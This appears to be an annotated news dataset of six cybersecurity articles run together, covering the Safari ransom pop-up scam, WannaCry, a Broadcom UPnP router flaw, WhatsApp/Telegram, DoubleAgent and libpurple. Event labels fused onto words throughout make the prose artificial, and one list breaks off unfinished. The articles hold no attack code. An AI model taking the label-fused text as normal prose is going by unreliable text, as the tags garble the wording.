iOS 10.3 , releasedVulnerability-related.PatchVulnerabilityto the public on Monday , patchesVulnerability-related.PatchVulnerabilitya bug that allowed bad actors to use a JavaScript pop-up in Safari in an attempt to extort moneyAttack.Ransomfrom iOS users . Security firm Lookout ( via Ars Technica ) said the scammers would target Safari users who viewed pornography by placing malicious scripts on various pornographic website that would create an endless pop-up loop that basically locked the browser , if an uninformed user didn ’ t know how to get around the flaw . The scammers abused the handling of pop-ups in Mobile Safari in such a way that a person would be “ locked ” out from using Safari unless they paid a feeAttack.Ransom— or knew they could simply clear Safari ’ s cache ( see next section ) . The attack was contained within the app sandbox of the Safari browser ; no exploit code was used in this campaign , unlike an advanced attack like Pegasus that breaks out of the app sandbox to install malware on the device . The scammers registered domains and launched the attack from the domains they owned , such as police-pay [ . ] com , which the attackers apparently named with the intent of scaring users looking for certain types of material on the Internet into paying money . The pop-ups claimed to beAttack.Phishingfrom law-enforcement personnel , and claimed the only way to get control of the browser back was to pay a fineAttack.Ransomin the form of an iTunes gift card code delivered via text message . Users actually could have gotten out of the pop-up loop by manually clearing the Safari browser cache . However , a new or otherwise uninformed user might believe they actually needed to pay the ransomAttack.Ransombefore regaining control of their browser . “ The attackers effectively used fear as a factor to get what they wanted before the victim realized that there was little actual risk , ” Lookout researchers Andrew Blaich and Jeremy Richards said . iOS 10.3 changes the way pop-up dialogs work in Safari . Previously , a pop-up dialog took over the entire Safari app . Now , pop-ups are only per tab . iOS users who are hit by the scam before updating to iOS 10.3 can clear their browsing cache by going to “ Settings ” - > “ Safari ” and tapping : “ Clear History and Website Data . ”
A massive attack is spreading globally by way of a vulnerability in Microsoft 's Server Message Block that was patchedVulnerability-related.PatchVulnerabilityin March . Ransomware is no longer just a nuisance . Now it 's quite literally a matter of life and death . A massive ransomware attackAttack.Ransombeing labeled as `` WannaCryAttack.Ransom`` has been reported around the world and is responsible for shutting down hospitals in the United Kingdom and encrypting files at Spanish telecom firm Telefonica . The WannaCry attackAttack.Ransomis not a zero-day flaw , but rather is based on an exploit that Microsoft patchedVulnerability-related.PatchVulnerabilitywith its MS17-010 advisory on March 14 in the SMB Server . However , Microsoft did not highlightVulnerability-related.DiscoverVulnerabilitythe SMB flaw until April 14 , when a hacker group known as the Shadow Brokers releasedVulnerability-related.DiscoverVulnerabilitya set of exploits , allegedly stolenAttack.Databreachfrom the U.S.National Security Agency . SMB , or Server Message Block , is a critical protocol used by Windows to enable file and folder sharing . It 's also the protocol that today 's WannaCry attackAttack.Ransomis exploiting to rapidly spread from one host to the next around the world , literally at the speed of light . The attack is what is known as a worm , `` slithering '' from one host to the next on connected networks . Among the first large organizations to be impacted by WannaCry is The National Health Service in the UK , which has publicly confirmed that it was attackedAttack.Ransomby the Wan na Decryptor. `` This attackAttack.Ransomwas not specifically targeted at the NHS and is affecting organisations from across a range of sectors , '' the NHS stated . `` At this stage we do not have any evidence that patient data has been accessedAttack.Databreach. '' Security firm Kaspersky Lab reported that by 2:30 p.m . ET May 12 it had already seen more than 45,000 WannaCry attacksAttack.Ransomin 74 countries . While the ransomware attackAttack.Ransomis making use of the SMB vulnerability to spread , the encryption of files is done by the Wanna Decryptor attackAttack.Ransomthat seeks out all files on a victim 's network . Once the ransomware has completed encrypting files , victims are presented with a screen demanding a ransomAttack.Ransom. Initially , the ransom requestedAttack.Ransomwas reported to be $ 300 worth of Bitcoin , according to Kaspersky Lab . `` Many of your documents , photos , videos , databases and other files are no longer accessible because they have been encrypted , '' the ransom note states . `` Maybe you are busy looking for a way to recover your files , but do not waste your time . Nobody can recover your files without our decryption service . '' It 's not clear who the original source of the global WannaCry attacksAttack.Ransomis at this point , or even if it 's a single threat actor or multiple actors . What is clear is that despite the fact that a software patch has been availableVulnerability-related.PatchVulnerabilitysince March for the SMB flaws , WannaCry is using tens of thousands of organizations that did n't patchVulnerability-related.PatchVulnerability.
Back in January 2013 , researchers from application security services firm DefenseCode unearthedVulnerability-related.DiscoverVulnerabilitya remote root access vulnerability in the default installation of some Cisco Linksys ( now Belkin ) routers . The flaw was actually foundVulnerability-related.DiscoverVulnerabilityin Broadcom ’ s UPnP implementation used in popular routers , and ultimately the researchers extendedVulnerability-related.DiscoverVulnerabilitythe list of vulnerable routers to encompass devices manufactured by the likes of ASUS , D-Link , Zyxel , US Robotics , TP-Link , Netgear , and others . “ Back in the days , Cisco fixedVulnerability-related.PatchVulnerabilitythe vulnerability , but we are not sure about all other router vendors and models because there are too many of them , ” the DefenseCode team noted . When DefenseCode first came outVulnerability-related.DiscoverVulnerabilitywith the vulnerability in 2013 , Rapid7 researchers also foundVulnerability-related.DiscoverVulnerabilitya number of flaws in other popular UPnP implementations , and by scanning the Internet , revealedVulnerability-related.DiscoverVulnerabilitythat there were approximately 15 million devices with a vulnerable Broadcom UPnP implementation . It ’ s difficult to tell how many of these devices are still vulnerableVulnerability-related.DiscoverVulnerabilitybut , as DefenseCode ’ s Leon Juranic pointed out to me , users rarely ( if ever ) update their router ’ s firmware , so there are bound to be still many of them . And given how many people have watched and analyzed their technical video of the exploit in action over the years , obviously many are interested in it . Still , I think we can all agree , four years is more than enough time for patchingVulnerability-related.PatchVulnerability, and nobody can fault them for publishing the exploit . Hopefully , if there are manufacturers that still haven ’ t pushed outVulnerability-related.PatchVulnerabilitya patch they ’ ll do it now , but this is could also be a welcome impetus for users to update their router ’ s firmware – especially those that haven ’ t done it for years . Whitepapers and offers
A flaw in popular messenger apps WhatsApp and Telegram , which could allow hackers to gain access to hundreds of millions of accounts using the very encryption software designed to keep them out , has been discoveredVulnerability-related.DiscoverVulnerabilityby cyber security firm Check Point . The Israeli multinational said it was concerned about vulnerabilities in the messaging apps , following WikiLeaks ’ ‘ Vault 7 ’ release of more than 8,500 CIA documents . “ One of the most concerning revelations arising from the recent WikiLeaks publication is the possibility that government organizations can compromise WhatsApp , Telegram and other end-to-end encrypted chat applications , ” the company said in a blog post . These online versions mirror all messages sent and received by a user ’ s mobile device , which deploys end-to-end encryption so that only those sending and receiving messages can view the content . Hackers could gain access to a user ’ s account , however , by booby-trapping a digital image with malicious code which would be activated once the image is viewed . The code could then spread like a virus by sending infected messages to a user 's contacts . “ This means that attackers could potentially download your photos and or post them online , send messages on your behalf , demand ransomAttack.Ransom, and even take over your friends ’ accounts , ” they added . Check Point saidVulnerability-related.DiscoverVulnerabilityit alertedVulnerability-related.DiscoverVulnerabilityboth companies to the problem last week and waited for the issues to be resolvedVulnerability-related.PatchVulnerabilitybefore making it public . Both companies have said they ’ ve since patched the problem . “ Thankfully , WhatsApp and Telegram responded quicklyVulnerability-related.DiscoverVulnerabilityand responsibly to deploy the mitigation against exploitation of this issue in all web clients , ” Check Point Head of Product Vulnerability Oded Vanunu said . The company has advised , however , that WhatsApp and Telegram web users should restart their browser to ensure they ’ re using the latest versions of the service
Security researchers from computer and network security outfit Cybellum have revealedVulnerability-related.DiscoverVulnerabilitya new zero-day code injection and persistence technique that can be used by attackers to take over applications and entire Windows machines . They demonstrated the attack on antivirus solutions , and ultimately dubbed it DoubleAgent , as it turns the antivirus security agent into a malicious agent . “ DoubleAgent exploits a legitimate tool of Windows called ‘ Microsoft Application Verifier ’ which is a tool included in all versions of Microsoft Windows and is used as a runtime verification tool in order to discoverVulnerability-related.DiscoverVulnerabilityand fixVulnerability-related.PatchVulnerabilitybugs in applications , ” the company explained . “ Our researchers discovered an undocumented ability of Application Verifier that gives an attacker the ability to replace the standard verifier with his own custom verifier . An attacker can use this ability in order to inject a custom verifier into any application . Once the custom verifier has been injected , the attacker now has full control over the application ” . In fact , the attack can be used to compromise all kinds of applications , but the researchers chose to focus on antivirus solutions since this type of software is generally considered to be trusted . “ By using DoubleAgent , the attacker can take full control over the antivirus and do as he wish without the fear of being caught or blocked , ” they noted . This includes : Cybellum researchers demonstrated a DoubleAgent code injection against Symantec Norton antivirus , and offered PoC exploit code on GitHub . More technical details about the DoubleAgent technique can be found here . The researchers have notified major antivirus vendors of their findings , and some of them ( Malwarebytes , AVG ) have already issuedVulnerability-related.PatchVulnerabilitya patch for the vulnerability . Among the still vulnerable antivirus apps are those by Avast , BitDefender , ESET , Kaspersky , and F-Secure . “ Microsoft has provided a new design concept for antivirus vendors called Protected Processes . The new concept is specially designed for antivirus services . Antivirus processes can be created as ‘ Protected Processes ’ and the protected process infrastructure only allows trusted , signed code to load and has built-in defense against code injection attacks , ” the researchers explained . “ This means that even if an attacker foundVulnerability-related.DiscoverVulnerabilitya new zero-day technique for injecting code , it could not be used against the antivirus as its code is not signed . Currently no antivirus ( except Windows Defender ) has implemented this design , even though Microsoft made this design available more than 3 years ago ” . The vulnerability that allows the DoubleAgent attack works on all Microsoft Windows versions and architectures . The attack technique can be used to take over any application , and even the OS . “ We need to make more efforts to detect and prevent these attacks , and stop blindly trusting traditional security solutions , ” the researchers noted . We implementedVulnerability-related.PatchVulnerabilitythe fix at the time of reporting and therefore can confirm that both the Avast and AVG 2017 products , launched earlier this year , are not vulnerable . It is important to note that the exploit requires administrator privileges to conduct the attack which is difficult for hackers to achieve
A severe vulnerability has been disclosedVulnerability-related.DiscoverVulnerabilityin libpurple , the library used in the development of a number of popular instant messaging clients , including Pidgin and Adium for the macOS platform . Adium 1.5.10.2 is vulnerableVulnerability-related.DiscoverVulnerabilityand can be exploitedVulnerability-related.DiscoverVulnerabilityto run arbitrary code remotely . A researcher who goes by the handle Erythronium submitted a postVulnerability-related.DiscoverVulnerabilityon March 15 to the Adium developers mailing list about the issue . While there ’ s been some discussion of a fix for CVE-2017-2640 , no Adium advisory or patches have been releasedVulnerability-related.PatchVulnerability. In the meantime , Erythronium told Threatpost that libpurple and Adium should no longer be used . “ Unless the [ Adium ] dev team comes outVulnerability-related.PatchVulnerabilitywith an advisory about this issue , a serious apology , a completely solid story about how they plan to handle future vulnerabilities in their codebase and its dependencies , and a way for people to reproduce their builds without depending on a creepy binary blob of libpurple , people should simply stop using it , ” the researcher said . “ It ’ s also very arguable that people should stop using libpurple completely , since it also lacks strong security practices in its development ” . A request for comment from two members of the Adium team was not returned in time for publication . “ Adium ’ s build process documentation does not seem to include steps for upgrading or rebuilding libpurple , and the copy of libpurple checked into Adium ’ s open-source repository as a binary blob of unknown provenance , ” Erythronium wrote in a post to the Full Disclosure mailing list . Adium is a freely available IM client for the Apple platform , and users may connect a number of other IM networks to it , including AIM , Google Talk , Yahoo Messenger and others . It ’ s written using the Cocoa API in macOS , and also supports Off the Record ( OTR ) encryption over XMPP . Libpurple is used in a number of IM programs , including Pidgin on Windows Linux and UNIX builds and Finch , a text-based IM program for Linux and UNIX . The vulnerability is an out-of-bounds write flaw that happens when invalid XML is sent by an attacker , Pidgin said in an advisory . “ Successfully exploiting this issue may allow an attacker to cause a denial-of-service condition , execute arbitrary code or perform unauthorized actions , ” saidVulnerability-related.DiscoverVulnerabilitya SecurityFocus advisory . The use of messaging apps that support encryption have been encouraged since the Snowden disclosures and other challenges to secure communication such as Apple vs. FBI . Adium specifically was included in a Privacy Pack recommended by the Electronic Frontier Foundation in the months following the Snowden leaks . The pack was a collection of tools for privacy conscious users , and included the Tor browser , encryption extensions for browsers , HTTPS Everywhere , and Pidgin and Adium for encrypted chats . Enterprise applications from Oracle and others could be becoming juicier targets for attackers . Developers using the Twilio platform to build enterprise mobile communications apps have put call and text data at risk for exposure . Between $ 150 million and $ 300 million in digital currency called ether remains inaccessible today after a user said he “ accidentally ” triggered a vulnerability that froze the funds in the popular Parity wallet